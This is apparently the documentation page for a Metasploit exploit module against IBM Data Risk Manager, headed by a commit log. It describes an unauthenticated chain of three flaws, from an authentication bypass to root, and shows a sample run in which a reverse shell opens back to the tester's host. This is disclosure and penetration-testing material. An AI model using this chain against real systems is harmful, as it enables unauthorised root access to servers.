Pedro Ribeiro
a17d78a327
Update documentation/modules/exploit/linux/http/ibm_drm_rce.md Co-authored-by: wvu-r7 <wvu-r7@users.noreply.github.com> Update documentation/modules/exploit/linux/http/ibm_drm_rce.md Co-authored-by: wvu-r7 <wvu-r7@users.noreply.github.com> Update documentation/modules/exploit/linux/http/ibm_drm_rce.md Co-authored-by: wvu-r7 <wvu-r7@users.noreply.github.com> Update ibm_drm_rce.md Update modules/exploits/linux/http/ibm_drm_rce.rb Co-authored-by: wvu-r7 <wvu-r7@users.noreply.github.com> Update modules/exploits/linux/http/ibm_drm_rce.rb Co-authored-by: wvu-r7 <wvu-r7@users.noreply.github.com> Update modules/exploits/linux/http/ibm_drm_rce.rb Co-authored-by: wvu-r7 <wvu-r7@users.noreply.github.com> Update modules/exploits/linux/http/ibm_drm_rce.rb Co-authored-by: wvu-r7 <wvu-r7@users.noreply.github.com> Update modules/exploits/linux/http/ibm_drm_rce.rb Co-authored-by: wvu-r7 <wvu-r7@users.noreply.github.com> Update modules/exploits/linux/http/ibm_drm_rce.rb Co-authored-by: wvu-r7 <wvu-r7@users.noreply.github.com> Update modules/exploits/linux/http/ibm_drm_rce.rb Co-authored-by: wvu-r7 <wvu-r7@users.noreply.github.com> make final changes! Update modules/exploits/linux/http/ibm_drm_rce.rb Co-authored-by: wvu-r7 <wvu-r7@users.noreply.github.com> Update modules/exploits/linux/http/ibm_drm_rce.rb Co-authored-by: wvu-r7 <wvu-r7@users.noreply.github.com> Update modules/exploits/linux/http/ibm_drm_rce.rb Co-authored-by: wvu-r7 <wvu-r7@users.noreply.github.com> Update modules/exploits/linux/http/ibm_drm_rce.rb Co-authored-by: wvu-r7 <wvu-r7@users.noreply.github.com> Update modules/exploits/linux/http/ibm_drm_rce.rb Co-authored-by: wvu-r7 <wvu-r7@users.noreply.github.com> Update modules/exploits/linux/http/ibm_drm_rce.rb Co-authored-by: wvu-r7 <wvu-r7@users.noreply.github.com> Update modules/exploits/linux/http/ibm_drm_rce.rb Co-authored-by: wvu-r7 <wvu-r7@users.noreply.github.com> Update modules/exploits/linux/http/ibm_drm_rce.rb Co-authored-by: wvu-r7 <wvu-r7@users.noreply.github.com> Update modules/exploits/linux/http/ibm_drm_rce.rb Co-authored-by: wvu-r7 <wvu-r7@users.noreply.github.com> Update modules/exploits/linux/http/ibm_drm_rce.rb Co-authored-by: wvu-r7 <wvu-r7@users.noreply.github.com> Update modules/exploits/linux/http/ibm_drm_rce.rb Co-authored-by: wvu-r7 <wvu-r7@users.noreply.github.com> Update modules/exploits/linux/http/ibm_drm_rce.rb Co-authored-by: wvu-r7 <wvu-r7@users.noreply.github.com> Update modules/exploits/linux/http/ibm_drm_rce.rb Co-authored-by: wvu-r7 <wvu-r7@users.noreply.github.com> Update modules/exploits/linux/http/ibm_drm_rce.rb Co-authored-by: wvu-r7 <wvu-r7@users.noreply.github.com> Update modules/exploits/linux/http/ibm_drm_rce.rb Co-authored-by: wvu-r7 <wvu-r7@users.noreply.github.com> Update modules/exploits/linux/http/ibm_drm_rce.rb Co-authored-by: wvu-r7 <wvu-r7@users.noreply.github.com> Update modules/exploits/linux/http/ibm_drm_rce.rb Co-authored-by: wvu-r7 <wvu-r7@users.noreply.github.com> Update modules/exploits/linux/http/ibm_drm_rce.rb Co-authored-by: wvu-r7 <wvu-r7@users.noreply.github.com> final final final
2.0 KiB
2.0 KiB
Vulnerable Application
IBM Data Risk Manager (IDRM) contains three vulnerabilities that can be chained by an unauthenticated attacker to achieve remote code execution as root. The first is an unauthenticated bypass, followed by a command injection as the server user, and finally abuse of an insecure default password. This module exploits all three vulnerabilities, giving the attacker a root shell. At the time of disclosure, this is a 0day. Versions 2.0.3 and below are confirmed to be affected, and the latest 2.0.6 is most likely affected too.
Vulnerability information
For more information about the vulnerability check the advisory at: https://github.com/pedrib/PoC/blob/master/advisories/IBM/ibm_drm/ibm_drm_rce.md
Setup
The application is available to download as a Linux virtual appliance from IBM's website. You need to have a valid IBM contract to be able to do so.
Verification Steps
Module defaults work very well, you should just need to set RHOSTS and LHOST.
Scenarios
Scenarios
A successful exploit will look like this:
msf5 exploit(linux/http/ibm_drm_unauth_rce) > run
[*] Started reverse TCP handler on 10.9.8.1:4444
[+] 10.9.8.213:8443 - Successfully "stickied" our session ID JQElTQxh
[+] 10.9.8.213:8443 - We have obtained a new admin password 28010e88-6ffb-46e9-90d6-2ded732120d1
[+] 10.9.8.213:8443 - ... and are authenticated as an admin!
[*] 10.9.8.213:8443 - Detected IBM Data Risk Manager version 2.0.2 or above
[+] 10.9.8.213:8443 - We have uploaded our payload...
[+] 10.9.8.213:8443 - and our nmap script file!
[+] 10.9.8.213:8443 - Bearer token 1b78100c-cf42-47fd-b64d-d36c07f1f934 obtained, wait for the final step where we invoke nmap...
[+] 10.9.8.213:8443 - Shell incoming!
[*] Command shell session 2 opened (10.9.8.1:4444 -> 10.9.8.213:57136) at 2020-04-21 15:46:29 +0700
whoami
root
uname -a
Linux idrm-server.ibm.com 3.10.0-862.3.2.el7.x86_64 #1 SMP Tue May 15 18:22:15 EDT 2018 x86_64 x86_64 x86_64 GNU/Linux